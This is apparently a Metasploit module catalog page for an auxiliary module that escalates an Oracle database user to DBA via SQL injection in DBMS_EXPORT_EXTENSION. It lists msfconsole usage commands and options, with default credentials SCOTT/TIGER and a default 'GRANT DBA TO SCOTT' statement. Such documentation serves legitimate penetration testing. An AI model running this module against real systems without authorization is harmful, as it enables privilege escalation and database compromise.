Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Open Source Vulnerability DataBase ID
Bugtraq ID
Full Text Search
Common Vulnerabilities Exposures ID
Microsoft Security Bulletin ID
 
Search Modules

Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION

This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2.


Rank


Authors


References


Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > set RHOST [TARGET IP]
msf auxiliary(dbms_export_extension) > run


Module Options

DBPASS The password to authenticate with. (default: TIGER)
DBUSER The username to authenticate with. (default: SCOTT)
RHOST The Oracle host. (default: )
RPORT The TNS port. (default: 1521)
SID The sid to authenticate with. (default: ORCL)
SQL SQL to execute. (default: GRANT DBA TO SCOTT)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module